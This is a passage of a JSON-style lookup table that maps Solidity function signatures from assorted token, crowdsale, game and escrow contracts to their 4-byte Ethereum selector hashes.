"debug_token_balanceof_faucet()": "0x50867236", "debug_is_recipient()": "0x048c35ca", "WHYPHY()": "0x73ca1b28", "HETCCStandardToken(uint256,string,uint8,string)": "0xaa86fbc5", "setBuyMinLimit(uint256)": "0x18da754a", "setBuyMaxLimit(uint256)": "0xe8477bda", "setSaleAmountCap(uint256)": "0x7822b902", "removeWhitelist(address[])": "0x23245216", "LAARToken()": "0x0b47459b", "updateReceivers(address[])": "0x49c9d17a", "passed(address[])": "0x0ed3d5b9", "depositWEI()": "0xc3c5026c", "TimeToken(uint256,string,uint8,string)": "0x5439f5d2", "Technology4G()": "0xf49627be", "ZZZToken(uint256,string,uint8,string)": "0x6a73de2c", "changeOwnerBook(uint256,address)": "0x29148c0c", "removeBook(uint256)": "0xbec0d799", "addBook(string,address)": "0xd22591c8", "removeLibrarian(address,address)": "0xad12cc0b", "addLibrarian(address,address)": "0xb3280830", "buyTeamHandle(string)": "0xa8aa7e19", "buyKeys(uint256,string,string)": "0x768afcec", "revenueShare(uint256)": "0x118a9db3", "distributeRevenue(uint256)": "0x59fde1e0", "putInWinnerPool(uint256)": "0x403f6cff", "setExpectedTimes(uint256,uint256)": "0x44146c26", "changeGasLimitAndPrice(uint256,uint256)": "0x9de6d9aa", "RaptorsvsWizards425()": "0x1ace02a3", "mint(address,uint256,uint32)": "0xd0047acf", "mint0(address,uint256)": "0x76c30794", "FFC()": "0x6191fe9d", "weiToUsdCents(uint256)": "0xa65f1193", "isMaximumPreFundingGoalReached()": "0x9d1c3f03", "getDifference(int256,int256)": "0x591d5236", "setExchangeRateAgent(address)": "0x083903de", "investInternal(address)": "0x93d5276b", "Crowdsale(address,address,uint256,uint256,uint256)": "0x77129790", "setCrowdsaleAgent(address)": "0x34103ee4", "SolarDaoToken()": "0x54186bab", "autoSolveGame(uint256,uint256,uint256)": "0xae8b9d7b", "solveGame(uint256,uint256)": "0xfb282f92", "_solveGame(uint256,uint256,uint256)": "0x20e76d31", "buyAndPlayGame(uint256,uint256,address)": "0xc27382d9", "buyAndCreateGame(uint256,uint256,address)": "0x188d0aae", "createGame(uint256,uint256)": "0x60104cef", "changeFeeCut(uint8,uint8)": "0x704dd019", "gameInfo(uint256)": "0xa6f81668", "RockScissorPaper(address)": "0x0938be6e", "setRSPScienceAddress(address)": "0x6f32b2ac", "_setRSPScienceAddress(address)": "0x423a968d", "calcPoseBits(uint256,uint256,uint256)": "0x9cda5a12", "isRSPScience()": "0xcb4c8ee4", "GoldenBullChainToken()": "0xb2fcb395", "changeRescueAccount(address)": "0x3a693759", "lastMint()": "0x586fc5b5", "hexToString(bytes32)": "0x48410f80", "internalDoubleTransfer(address,address,uint256,address,uint256)": "0xad82ae61", "airDrop(address[],uint256[])": "0x65216a41", "Workcoin()": "0xd97b0a6e", "transferERC20Token(address,address,uint256)": "0x92940bf9", "transferEther(address,uint256)": "0x05b1137b", "setSeller(address)": "0xe99d2866", "FlatPricingExt(uint256)": "0x29ee0480", "setTier(address)": "0x55c081d4", "StrongHold()": "0xffa8acde", "setJoinedCrowdsales(address)": "0x123cc082", "getLastTier()": "0xc24becf3", "getTierPosition(address)": "0xaf58574a", "isTierJoined(address)": "0x253ebd92", "whitelistedParticipantsLength()": "0x1a98d0de", "isAddressWhitelisted(address)": "0x13f44d10", "updateEarlyParticipantWhitelist(address,uint256)": "0xc12eb191", "updateInheritedEarlyParticipantWhitelist(address,uint256)": "0xa304f625", "setEarlyParticipantWhitelistMultiple(address[],bool[],uint256[],uint256[])": "0xb1cb574b", "setEarlyParticipantWhitelist(address,bool,uint256,uint256)": "0x895594f6", "canDistributeReservedTokens()": "0xbd719336", "areReservedTokensDistributed()": "0x25e0671f", "distributeReservedTokens(uint256)": "0xcddaf241", "CustomToken()": "0x418cb077", "JaneToken()": "0x82fe1e46", "bankrupt(address[])": "0x577131ac", "airdrop(address[],uint256)": "0xc204642c", "getZero(uint256)": "0x7c82eff7", "percent(uint256,uint256,uint256)": "0x002c1a9e", "DunkPayToken()": "0x86f822fa", "CrowdsaleToken(string,string,uint256,uint8,bool)": "0x741f7034", "calculateMintTotal(uint256,uint256,int256)": "0x58fa67f9", "calculateFraction(uint256,uint256,uint256)": "0x6a2f9536", "calculateStakeGains(uint256)": "0xae1adba2", "stakeTokens(uint256)": "0x7547c7a3", "ownerClaim()": "0x4dbe5889", "getStakedBalance()": "0x76965867", "claimStake()": "0xeb321173", "stakeBelaSplit(uint256,address)": "0x98290c53", "stakeBela(uint256)": "0x8c2305fd", "Bela()": "0x055e0e07", "Blocform(address)": "0x37f534b6", "UmmahDinar()": "0x6e51be3d", "SSAToken()": "0x3bac2837", "unlockAccount(address)": "0x905295e3", "lockAccount(address)": "0x47a64f44", "RailzToken()": "0x8422b3bf", "mine(address,uint256)": "0xab27be20", "Doftcoin()": "0x44909c99", "transferDoftManagment(address)": "0x7850a6b2", "doftManaged()": "0x008066b6", "disableInitialStage()": "0xa8e04f34", "Hourglass()": "0x8fea64bd", "_create_mineral(bytes32,address,uint256,uint256)": "0x0ccc68bb", "createAllTokens()": "0x84f06570", "getMinerals()": "0x2ad11b9e", "getMineral(uint256)": "0xf2b29993", "openGame()": "0xfa12d782", "createPromoMineral(bytes32,address,uint256,uint256)": "0x78beda71", "createMineral(bytes32,uint256)": "0x16786ae2", "EtherMinerals()": "0x308dccac", "setLast(uint256,address)": "0x5f5082dd", "currentState()": "0x0c3f6acf", "_mint(uint256,address)": "0xe855aee5", "_receiveFundsUpTo(uint256)": "0x18a45c41", "_sendRefund()": "0x72e05569", "presaleTokenAmount(address)": "0x91aaf2e9", "mintPresaleBonuses()": "0x3c69a5e6", "mintAllBonuses()": "0x3714e274", "withdrawFundsAndStartToken()": "0x66bc0d6d", "deferredKyc()": "0xa1960d80", "bancorTradingContract()": "0xec4aca2a", "athenians()": "0x38471dd6", "resetIndex()": "0x28d969a5", "ownersPayed()": "0x525ffb7c", "fundingGoalUSD()": "0x7de47b3f", "FLUX()": "0xcff5b28e", "companySite()": "0x02bc54bf", "t_wallet()": "0x56c290b8", "Limit()": "0x4f057506", "TEC_TOKENS_NUMS()": "0x97d551a1", "totalWin()": "0xaa1ba6a9", "cleanFinishedOperations(uint256)": "0x206cfd24", "_cancelOperation(bytes32,uint256)": "0xcfb45e3c", "_checkVotes(uint256,bytes32,bytes32)": "0x6908ea00", "_deleteOperation(bytes32,bool)": "0x69793570", "unsafeResignOwnership()": "0x8911cf0d", "nestedSecondSome(uint256,uint256)": "0xa670b9e7", "nestedFirstAnyToSome(uint256,uint256)": "0x422f3a2c", "nestedFirstManyToSome(uint256,uint256)": "0x0c5e3f11", "nestedSecondAnyToAny(uint256)": "0xf8f53ce7", "nestedFirstAnyToAny2(uint256)": "0xf3107c48", "nestedFirstAnyToAny(uint256)": "0x50edd8c2", "nestedSecondAllToAll(uint256)": "0x8b34a4b3", "nestedFirstAllToAll2(uint256)": "0x48cc38e1", "nestedFirstAllToAll(uint256)": "0xcbc264f2", "setValueSome(uint256,uint256)": "0x68404cd9", "setValueAll(uint256)": "0x36c0aada", "doThing(string)": "0xbb5e3d3b", "onlyCapperMock()": "0xd1e07bcb", "removeCapper(address)": "0x3f4a6484", "onlySignerMock()": "0xb44e2ab9", "setAllowed(address,bool)": "0x4697f05d", "callTransfer(address,uint256)": "0xd4440991", "onlyPauserMock()": "0x329daf90", "removePauser(address)": "0x6b2c0f55", "registerInterface(bytes4)": "0x214cdb80", "onlyPrimaryMock()": "0x84622425", "onlyMinterMock()": "0xb5dba35b", "onlyWithValidSignatureAndMethod(bytes)": "0x6123f7ba", "checkValidSignatureAndMethod(address,bytes)": "0x6b802108", "onlyWithValidSignature(bytes)": "0x6d5b9427", "checkValidSignature(address,bytes)": "0x68b51ac7", "mintToMany(address[],uint256[])": "0x92524725", "VanityToken_v3()": "0x14633039", "VanityToken(address)": "0x0bf6dbfd", "buyTokens(address,uint256,bytes32[])": "0xbf99cce1", "setCapsMerkleRoot(bytes32)": "0x0534ab04", "_tokensForEth(uint256,uint256)": "0xcdd6d079", "sellTokens(address,uint256,uint256,address,bytes)": "0xa57c6e86", "ethForTokens(uint256)": "0x7e69ba22", "tokensForEth(uint256)": "0x2e834576", "fillReserve()": "0xfb3918d7", "Corban(address)": "0x89a3e807", "TokenImpl()": "0x9ec8eec9", "expectRefund(uint256)": "0xa3494fdc", "nestedSecond(uint256)": "0xdea216af", "nestedFirst(uint256)": "0xac6d0fed", "setValueAny(uint256)": "0xaf7bfd6c", "attack(address,uint256,uint256)": "0x452ae331", "buyTokens2(address)": "0xf243c170", "save(uint256,uint256,uint256)": "0xfa5a1db6", "updateData(uint256,uint256,uint256,uint256,uint256,bytes,bytes)": "0xc7f18d5b", "deleteById(uint256)": "0x4e542c5f", "findById(uint256)": "0x9a64a276", "getByFromAndTo(uint256,uint256,uint256)": "0x3d62fa80", "getByFrom(uint256,uint256)": "0xe9efdd6b", "getByTo(uint256,uint256)": "0xf452f32d", "getByFromAndToCount(uint256,uint256)": "0x47bb159d", "getByFromCount(uint256)": "0x95b71187", "getByToCount(uint256)": "0xb2990de1", "requestsCount()": "0xfbfa4b7f", "setAddressOf(string,address)": "0x990e80a3", "addressOfName(string)": "0x8c618066", "incrementedIndexOfName(string)": "0xfa5da441", "nonceForPublicKeyX(uint256)": "0x121a47ac", "isRegisteredPublicKey(uint256)": "0xdd751310", "publicKeyYForX(uint256)": "0x694278da", "setNonceForPublicKeyX(uint256,uint256)": "0x4f8fc8ef", "unregisterPublicKey(uint256)": "0xe5fd6364", "registerPublicKey(uint256,uint256)": "0x6f494049", "clientKeysCount(uint256)": "0x11f15380", "clientKeys(uint256,uint256)": "0x81e559ae", "info(uint256,bytes32)": "0x0d1d38aa", "deleteInfo(uint256,bytes32)": "0xe7637b5b", "setInfo(uint256,bytes32,string)": "0x1d4cecaa", "keysCount()": "0xe4f627fe", "ERC20WithMetadata(string)": "0x6a2b9e9d", "deploy(bytes,uint256)": "0x9c4ae2d0", "transferPrimary(address)": "0x2348238c", "primary()": "0xc6dbdf61", "callERC165SupportsInterface(address,bytes4)": "0x6ec4e5b8", "supportsERC165Interface(address,bytes4)": "0x2ba96462", "supportsInterfaces(address,bytes4[])": "0x38b52627", "supportsInterface(address,bytes4)": "0xd9057007", "supportsERC165(address)": "0xc398a925", "_deployContract()": "0xe81b34af", "claimed()": "0xe834a834", "openingTime()": "0xb7a8807c", "getContribution(address)": "0x21eff7fc", "icoedAmount()": "0xc3e2f26e", "bonusStage2SecondDay()": "0xb0e5aa89", "bonusPool()": "0x2693ee80", "isTokensPreIcoDistributed()": "0x38151930", "totalDrop()": "0xea520b18", "founderTimeLock()": "0x34bb1a9e", "CashForHardwareReturn()": "0x6169a7ed", "ico3Min()": "0xecf59b83", "totalTicketsSold()": "0x34701db8", "platformReferral()": "0xf2b2ff1b", "winNum()": "0x51dc7659", "address1a()": "0x84b735c2", "assignedAmountToDevelopmentTeam()": "0x01ad3936", "minWeiAmount()": "0x21f222dd", "tokensPerEthAtRegularPrice()": "0xe6634e41", "minBalanceForAccounts()": "0x47f1d8d7", "roundEnds()": "0xafa12a8a", "gameGiftUserTotalTimes()": "0x45cb4559", "grantTeamAdvisorSupply()": "0x11815312", "ethEurFraction()": "0x664c7bf7", "teamFee()": "0xd7c94efd", "_icoPercent()": "0x501e3a2c", "bltMasterAcc()": "0x88ffc33e", "remainingOwner()": "0xa4f91a2e", "tomoDepositAddress()": "0xebbfcfef", "SECURITY()": "0xfc036d7c", "isGlobalPause()": "0xe056c1eb", "finishDividends()": "0x5db524ad", "ACTION_KEY()": "0x75e5598c", "multilocked()": "0x13887592", "presaleEndBlock()": "0x75ac3b08", "protocolFeeRecipient()": "0x64df049e", "xperToken()": "0x2345fe81", "minBetVal()": "0xb862d80d", "usdMnr()": "0xea6723cd", "lccxTeamAddress()": "0x6aebff5d", "currNumOfUpgrades()": "0x7ef2bd52", "releaseTimeFund()": "0x471d4118", "countPlayersInPosition()": "0x2488fd55", "reopen()": "0xccc108d7", "depot()": "0x016899de", "deathData_a2()": "0x20610779", "tokenOwnerNumber()": "0x17f8252e", "treasuryContract()": "0x18da0011", "ADVISORS_AND_CONTRIBUTORS_TOKENS()": "0x7e38d065", "totalCentsGathered()": "0x26ebe0bf", "tier2LOT()": "0xa553c4d2", "knightAddress()": "0x72cc1f5a", "windowPeriodEnd()": "0xb6ded5c1", "thirdStagePriceOfTokenInWei()": "0x15da63a0", "redeemed()": "0xe231bff0", "WEI_PER_ETH()": "0x74ffdcd0", "maxRange()": "0x89ce16cc", "getFreeHatchCnt()": "0x40c36524", "tier2Time()": "0x4ca6d7e6", "acquireFreeEgg()": "0x705b164f", "MELON_BASE_UNIT()": "0x9f753df6", "hasFreePlaces()": "0xfa65d336", "stopTimeLength()": "0xbfd525b3", "silo()": "0xeb3beb29", "artworkSaleCount()": "0x0e275b49", "getCurrentHardcap()": "0x1d18ee83", "endBuyBackDate()": "0xa30fbae1", "AIR_1_SUPPLY()": "0x800626a6", "nay()": "0xea2fe1a2", "stageThree()": "0xda57736f", "tokenCreationMaxPrivateSale()": "0xf4cb4ae3", "FIRST_USER_CUT()": "0xe085448f", "defaultBonussRate()": "0x067ad784", "totalBunny()": "0x847ec2de", "Gamblers_Until_Jackpot()": "0x3f1887e9", "Ast()": "0xd32cbabb", "allocated24Months()": "0xc8865c0e", "addressPrivateSale()": "0xcca41651", "minNumbPerSubscr()": "0x7beb2e1e", "desc()": "0x55f150f1", "PRESALE_START_WEEK1()": "0x14f64d6c", "amount_milestone()": "0x12aaafa7", "REQUIRED_SHARES_TO_BE_BOARD_MEMBER()": "0x06fde169", "oneTrancheAmount()": "0x02443111", "endCloseSale()": "0xe1fa70ef", "mMaxChainCode()": "0x5c5e274e", "BONUS_15_DAYS()": "0xb612ac29", "weiDonated()": "0xa310293e", "getRealXaurCoined()": "0x3a50083d", "OUTINGRESERVE()": "0xbd945430", "ethpaused()": "0xc96027b3", "startThirdPhase()": "0x3f0218ac", "ratePrivateSaleStage()": "0x630cd1e9", "overdraftAllocation()": "0x04b92b7d", "isSuccessOver()": "0x7094d21e", "saleStartUnixTime()": "0x1e06c41f", "minPresaleAmount()": "0xff80b69a", "round2Cap()": "0xa3d23e52", "divForTeamEthContract()": "0x1627c3c1", "adapterEnabled()": "0x4edba7bf", "endBlockBonus1()": "0xa5ce0693", "preIcoFinishTimestamp()": "0x0214e9cf", "wd()": "0x8edec689", "activityCore()": "0x048986ae", "tokenReserved()": "0xe195d096", "receiversCount()": "0x360ed9c2", "edCoreContract()": "0x3239825c", "ACCEPT_DICE()": "0x9dab4607", "maxPlayableGameId()": "0xcf92e19b", "secToNextMiningInterval()": "0x22dde4cd", "tokenAllocated()": "0x78f7aeee", "directSellSupply()": "0x72453422", "restrictTransfers()": "0xd37a9bb0", "COMMUNITY_CAPPED_VALUE()": "0xe30651b4", "MAX_DAILY_TOKEN_COSIGN_SPEND()": "0xc6d9112a", "ICO_RATE()": "0x3bd099d3", "large()": "0x12987c98", "dgt()": "0x2af8afca", "slaveWalletPercent()": "0x258108da", "startProICO()": "0x0745c160", "MAT_UNIT()": "0x2a46d079", "certifier()": "0x120c7efd", "VESTING_WALLET()": "0x65604a11", "summCashwolf()": "0x7c44066c", "closePreICOPublic()": "0xd0b5981f", "quarter1()": "0x38f8f3cc", "soldDuringTokensale()": "0x98d78fe2", "ExerciseEndTime()": "0x55a392ac", "collectDonations()": "0xdc0bd011", "pong()": "0xbc9748a1", "consortiumPlaceholder()": "0xc2473378", "athlete()": "0x412a7be0", "bonusStart()": "0x6261c662", "totalTokensBought()": "0xbaa9e531", "holdContract()": "0x8f36039c", "finalizeTransferChildrenOwnership()": "0xcc9062f9", "securityDepositRegistry()": "0x8b2ef965", "contractTokenReward()": "0xfb03735e", "getTokensForGraphenePower()": "0x013459ca", "payoutDate()": "0x090f4465", "getCryptodiamondAddress()": "0x99119290", "investmentIdLastAttemptedToSettle()": "0xfb9e1270", "PRESALE_TOKEN_HARD_CAP()": "0xc805b6bc", "TOTAL_HAWKING()": "0xb4349daf", "lastBlock_v2Hash_uint256()": "0x099a5ab8", "times8()": "0x3edcd61f", "takerFee()": "0x43f0179b", "topUpAmount()": "0xdd592a32", "ico2_startdate()": "0xea9c3bb3", "backendWallet()": "0xa680baaf", "activated_time_()": "0x637ec389", "ratePresale()": "0x03048590", "UP_winRate()": "0x02d7ccef", "icoFundingRatePredictionBonusInPercentage()": "0x0ca9183c", "FACTOR()": "0x35815b95", "totalAmountRaised()": "0x242d7dba", "StartTime()": "0xfc4a4a1e", "mCURRENT_STATE()": "0x19eced6d", "ethDailyLimit()": "0x42ed5816", "halfyearteam_trade_date()": "0xca9fa49e", "deathData_a0()": "0xc9d9c2b4", "setOwnedBonus()": "0x7db91595", "determineWinnerScript()": "0xfdfd5b43", "referrerLevel3Percent()": "0xebda6686", "metaBaseUrl()": "0xb5c07eab", "openingTimeB()": "0x94194be4", "tokenExchangeRateInWei()": "0x021dc2fc", "bbwallet()": "0x3a96df81", "startICOStage7()": "0x1f212106", "setBonusPrice()": "0x7c686c15", "BETTING_CLOSES()": "0xf62e037c", "initializeUsers()": "0x457bb613", "creatorad()": "0x57405301", "currentCharId()": "0xdced2f1a", "baseACL()": "0x086b339e", "citadelBalance()": "0xcf20ac40", "lastScheduledTopUp()": "0xb3253e0f", "investorGiven()": "0x1aadddea", "airdropFinished()": "0x3222ae71", "ALLOW_BETA()": "0xf37a9c1c", "RANGESTART_11()": "0xd03bf119", "profitDistributionContract()": "0x86432925", "cardsMinted()": "0x4104df21", "_founder()": "0x09b637bc", "transfersFrozen()": "0xe45b8134", "initiated()": "0x9f118536", "OLD_TOKEN()": "0xf3791477", "bonusSubscription()": "0xf97a9d38", "isSynthesizeAllowed()": "0x5a65f004", "getCurrFeeRate()": "0xae92b204", "minBuyETH()": "0x3930d3dd", "ethReceived()": "0xf5f2de34", "tge()": "0xa7497fa5", "bankersAcceptanceOfDeal()": "0x41446e0a", "totalPendingWithdrawals()": "0xa4563e03", "etherPriceInDollarOut()": "0x78186f51", "box1Star4()": "0xb3d73743", "minimumPresaleWeiDeposit()": "0xfb26c3f8", "BTCReceived()": "0x99ceb6e6", "runInOneDay()": "0xd342e4f4", "WeiinEth()": "0xdf7efed8", "sunset()": "0x026164ad", "tokenCreationMinMile1()": "0xcd86eee2", "phaseCrowdsale()": "0xa8ac262b", "revenueFraction()": "0x136dbbab", "jackpotFraction()": "0x772506bb", "totalsData()": "0xf8b45b06", "lastWinner()": "0xfe188184", "latestParams()": "0x14beb3a3", "latestData()": "0x142bc2ae", "baseTokenBalance(address)": "0xb80e63df", "baseETHBalance()": "0xcb146814", "MBCash()": "0x08f2e704", "DolarToday()": "0x90faeb62", "DCCToken()": "0x927319ba", "EtherModifierTigro()": "0x6ba951c4", "ERCFW()": "0xdf3be9e8", "zeuscoin()": "0x55c28ed0", "cyberEntry2(address,bytes32)": "0x6111bd91", "STLToken(string,string,uint8,uint256)": "0xf79cfaea", "COD()": "0x5a657452", "VRJToken()": "0x8a196437", "addToAddresses(address,address)": "0x83b3999a", "TarynToken()": "0x08165230", "GACT()": "0x2a8565b4", "getCurrentPhaseDivisor()": "0x1afe3e10", "getCurrentPhaseCloseTime()": "0x695c5a26", "TXOsaleTwo()": "0x3ad84c89", "StarzToken()": "0x1ebe5051", "StripperToken()": "0x3b623c19", "getRepayAmount(uint256)": "0x6ec32f9c", "submitTrade(address,uint256,address,bytes)": "0xf3d791ea", "_isVotingAddress(address)": "0x1436fb39", "_rewardVote(address,address,uint256)": "0xd1a40ce1", "FLTTToken()": "0x44ed9039", "ERC20token(uint256,string,uint8,string)": "0xbe160a92", "releaseAllocation(address)": "0xbb30d796", "setAllocation(address,address,uint256,uint256[],uint256[])": "0xc9cfa6ba", "subAllocation(address)": "0xc90763f0", "canSubAllocation(address,uint256)": "0xc50ff563", "OSPN()": "0xbc0b45fa", "RadiumToken(address)": "0xab5a7076", "unstash(uint256)": "0x3afa476c", "stash(uint256)": "0xbcc5dce5", "getLimitPeriod()": "0x8c8b802e", "_transferFromInvestor(address,address,uint256)": "0xa358aa18", "_transferInvestor(address,uint256)": "0xb549c6b3", "_timelimitCal(address)": "0xfe758a1e", "setOpeningTime()": "0x30ece116", "delSuperInvestor(address)": "0x91923d7f", "setSuperInvestor(address)": "0xe50d2da1", "delCEx(address)": "0x31c1eea4", "setCEx(address)": "0x5da85a16", "changehiddenOwner(address)": "0x6d308c40", "transferSuperOwnership(address)": "0x62abb560", "delOperator(address)": "0x3e30838d", "STASToken()": "0x9bfe171a", "FreeDiceCoin()": "0x828a33b9", "TIMEDEX()": "0x41a41523", "getCardCanPresaleCount()": "0x735b38a3", "cardPresale(uint16)": "0x1d90c509", "setELHeroTokenAddr(address)": "0x3c21fa2e", "addBonusBatch(uint256[],address[])": "0x36c8c0e9", "sendTokensToBatch(uint256[],address[])": "0x07630eac", "GENPCoin()": "0x39b7e62f", "MordernToken()": "0x4b8f4b5e", "mintArray(address[],uint256[])": "0xf15627a1", "FHCoin()": "0xf2225500", "addExceptAddress(address)": "0xf3922cde", "changeRefPercentage(uint256)": "0xae91b691", "sendRefTVs(address)": "0x3284d75c", "Evernal(address)": "0xa470afa7", "ScudoCoin()": "0xeb581c8f", "YDTC()": "0x303ff1d8", "Atlantide(uint256,string,string)": "0xcefed526", "borrow(address,uint256,address,bytes)": "0xc046d9b5", "repay(address,uint256)": "0x22867d78", "borrowFor(address,address,uint256)": "0x30880441", "totalSupplyOf(address)": "0xcf9530d0", "executeArbitrage(address,uint256,address,bytes)": "0x7b0f6f18", "ICT(uint256,string,string)": "0x0cb1d243", "EWBToken()": "0x72b3936d", "LRCCcoin(uint256,string,string)": "0xf1a9d749", "addWhitelistedBurn(address,address)": "0x8e81bc9c", "activateTransfers()": "0x3a62244f", "TaylorToken()": "0xd20c34de", "delegatedSignedRemittance(bytes,address,address,address,uint256,uint256,uint256)": "0x48b5677f", "delegatedSignedEscrow(bytes,address,address,address,uint256,uint256,uint256)": "0x333bfec5", "isUserInBlackList(address)": "0x855b842d", "onlyWhitelisted(bytes,address,uint256,uint256,uint256)": "0x3b47513b", "recoverPreSignedHash(address,bytes4,address,uint256,uint256,uint256)": "0xe9024691", "cyberEntry(address)": "0x225c4011", "extractTokenEth(uint256)": "0xb90b1248", "IChain(address,uint256,uint256)": "0x9c4ca8cb", "futxMiner()": "0x76098303", "futrMiner()": "0xc7f71103", "TokenAFL(uint256,string,uint8,string)": "0x1ebf42e5", "allowRefunds()": "0x59c656df", "safeTransfer(address,uint256,bytes)": "0xeb795549", "AQBToken()": "0xdb75dd5f", "makePresaleReady()": "0xa260d8da", "convertToEth(uint256)": "0xfe18d6e6", "convertToMeth()": "0x9940fb5d", "setPackLimit(uint16)": "0xd42a5011", "EtherandomProxy()": "0xa715ff59", "etherandomExecWithGasLimit(bytes32,bytes32,uint256,uint256)": "0x1f201e39", "etherandomExec(bytes32,bytes32,uint256)": "0xd216d55d", "etherandomCallbackAddress()": "0x384e5018", "Etherandom()": "0x1df5e755", "EtherAds(address,address,address)": "0x838445e8", "EthBank()": "0xdbf45aa3", "ETCSurvey()": "0x1768b436", "EscrowFoundry()": "0x8383bfc8", "EscrowContract(address,address,address,address,uint256,uint256,uint256,uint256)": "0x0bad342a", "Escrow()": "0x22f607f6", "ERW()": "0x0bd2ae1c", "ERC20Base(uint256)": "0xfc72c1ef", "equal(string,string)": "0x46bdca9a", "equals()": "0xd4625a3a", "entryDetails(uint256)": "0xf67abd87", "endsWith()": "0xacbf98a7", "EndRound(uint256)": "0x2c46d8d5", "EnableDisableTokenProxy()": "0xe3a9b508", "emitApprove(address,address,uint256)": "0x23385089", "Emailer()": "0xf63da25b", "edit(address,bytes,bool)": "0x0c7de59d", "_ecMul(uint256,uint256,uint256,uint256)": "0x913f424c", "_ecDouble(uint256,uint256,uint256)": "0xf47289e1", "_ecAdd(uint256,uint256,uint256,uint256,uint256,uint256)": "0xdb318833", "EC()": "0xa08b3367", "DVIPBackend(address,address)": "0xe570be18", "DVIP(address)": "0xf245b9e4", "DVIP()": "0xaca66aec", "_dumpToCompany()": "0xef5daf01", "dumpOut()": "0x5e0e2957", "DTE()": "0x200538c6", "drop(bytes32)": "0x4f39ca59", "Draws(uint256)": "0xe436bdf3", "DrawPrepare()": "0x18433bb7", "drawPot(bytes32,bytes32)": "0x89d8ca67", "draw()": "0x0eecae21", "drain()": "0x9890220b", "download()": "0x4974bc27", "doubleyour5()": "0xdc583801", "doTransferOther(address,address,address,uint256)": "0x13220305", "doTransfer(address,address,uint256)": "0x37751b35", "donkeysEligibleForFees()": "0x23509e69", "donkeyRanking(uint256)": "0x26161670", "donkeyName(address)": "0xc9bbc8c0", "donkeyInvested(address)": "0xad1ef61e", "doMelt(uint256,uint256)": "0x7997b997", "dogFight()": "0xddf187b0", "Docsign()": "0x8ac78c80", "doCoinage(address[],uint256[],uint256,uint256,uint256)": "0x7fd238ba", "doCall(uint256)": "0xf1bca7a4", "doBurnFromContract(address,uint256)": "0x60c311fd", "doBurn(address,uint256)": "0xdfdb5f17", "doBalanceFor(address)": "0x33fd066d", "doBalance(address)": "0xe916d0f0", "doBalance()": "0x0d48e8d0", "DividendProfit()": "0x4a2b0c38", "Dividend()": "0x8df554b3", "divest(uint256)": "0x8ca17995", "divest(address,uint256)": "0xbb504317", "divest(address)": "0x11af3c68", "divest()": "0x058aace1", "div10(uint256,uint8)": "0x2ef875fb", "distributeEarnings()": "0x76577eae", "DistributeDividends(uint256)": "0x4ecd73e2", "Dispute()": "0x44691f2b", "dispute()": "0xf240f7c3", "_dispatchEarnings()": "0x423e7e79", "discontinue()": "0x1f0f711f", "disburse(address,uint256)": "0x7f3bd56e", "_disallow()": "0x0d17bc2e", "directionCount(int256,int256,int256,int256)": "0x1b3a8e6f", "Difficulty()": "0x91b4a0e7", "didWin(bytes32)": "0x0f06670a", "Dice(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x6545bed3", "Dice(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x5e855f14", "Dice()": "0x594151e0", "DgxSwap()": "0x56105a08", "dgxBalance()": "0x41395efa", "destruct()": "0x2b68b9c6", "destroyTokens(uint256)": "0x67fbd289", "destroyToken(address,uint256)": "0x9b1ad792", "deriveKey(uint256,uint256,uint256)": "0xe241c1d9", "depositRevenue()": "0x44e43cb8", "DepositLimit(uint256)": "0xb47fa7e0", "DepositHolder()": "0xbb3ce7fe", "depositFor(address)": "0xaa67c919", "deposit(bytes16[],uint64)": "0xc5b1a53c", "deposit(address,uint256)": "0x47e7ef24", "deposit(address,string)": "0xb7482509", "deposit(address,uint256,bytes32,uint256)": "0xec2ac54e", "deploy(uint256,string,string,address)": "0xacfdfd1c", "depletable()": "0x4abb9d39", "demintTokens(int256,address,uint8)": "0x07ef99a0", "deleteThing(bytes32[])": "0xc0f5a9cb", "DeleteContract()": "0xe4dedc7f", "deleteCoin(uint256)": "0x928a00d2", "delegate(address)": "0x5c19a95c", "declareLove(string,string)": "0x54107401", "debtors(address)": "0xaa6be303", "totalDebt()": "0xfc7b9c18", "toString()": "0x47e46806", "TossMyCoin()": "0x15a03930", "toSlice(string)": "0xafed762b", "toSliceB32(bytes32)": "0x43ec3f38", "topDogInfo()": "0x51560da9", "Tomeka()": "0x283a4576", "toldYouItWouldWork()": "0xf2022905", "token(uint256,string,uint8,string)": "0xb29c2493", "TOKEN_TARGET()": "0x6c1a5b8c", "Token(string,string,uint8,uint256)": "0xd5089396", "TokenSale(address,uint256)": "0x4da47ba0", "TokenSale()": "0x31380c89", "tokenPrice()": "0x7ff9b596", "TokenEther(string,string)": "0xb05e390a", "toBase58(uint256,uint8)": "0xdd137b5d", "timePassed(uint256)": "0xcfed9199", "timegame()": "0x2f5a5c5b", "TimeDeposit()": "0x5f17114e", "tickingBomb()": "0xd7f746ce", "ticketsAvailable()": "0x18253234", "throwScraps(uint256)": "0x857d4c07", "ThisExternalAssembly()": "0xda25c0cd", "thing(string,string,string)": "0xe3848e5b", "thingExist(bytes32[])": "0x18489f50", "thewhalegame()": "0x3c6e03d7", "theultimatepyramid()": "0x6f9a023c", "thesimplegame()": "0x83c51a38", "theRun()": "0x7399646a", "TheGrid()": "0xafbec8df", "TheGame()": "0x0e3f732a", "TheEthereumLottery()": "0x87fd0421", "theDonkeyKing()": "0x83d8a90f", "The10ETHPyramid()": "0xc96593a0", "testWager()": "0x4cad42d3", "test(string,string)": "0xbab86ea8", "testPrice(uint256)": "0x2af7ceff", "testingContract()": "0x1465aa97", "TestContract()": "0x08714bfa", "terminateAlt()": "0x4dc7cc55", "taskRejected(uint256,uint256)": "0x93cc9162", "taskProcessedWithCosting(uint256,uint256)": "0x36e6b92e", "taskProcessedNoCosting(uint256)": "0x922fc84b", "TargetHash()": "0x420ef2b3", "tap(bytes20)": "0xe2ee9941", "Tanya()": "0xbf55486b", "takeOrder(bool,uint256,uint256)": "0x4f073130", "takeFee(address,uint256,string)": "0xd422e4e0", "switchMPO(address,address)": "0xb660d77c", "Switch()": "0xd60dcb5d", "swap(address,address)": "0x6b76484e", "SwapContract(address,uint256)": "0xcd57a448", "surrender()": "0xb71c47a2", "submitVideo(string,string)": "0x2da8f764", "submitCoding(string,uint256)": "0x9077dcfd", "stringToBytes32(string,string)": "0xfc01abbe", "_stringGas(string,string)": "0x2fcb6628", "stra2cbor(string[])": "0xf60381a1", "_storeBalanceRecord(address)": "0x877653f0", "Store(address[])": "0xdda9939c", "store()": "0x975057e7", "stopContract()": "0x12253a6c", "_state()": "0xa1cb31b7", "startsWith()": "0x0fbf7151", "start(string,string,uint256,uint256,uint256,uint256)": 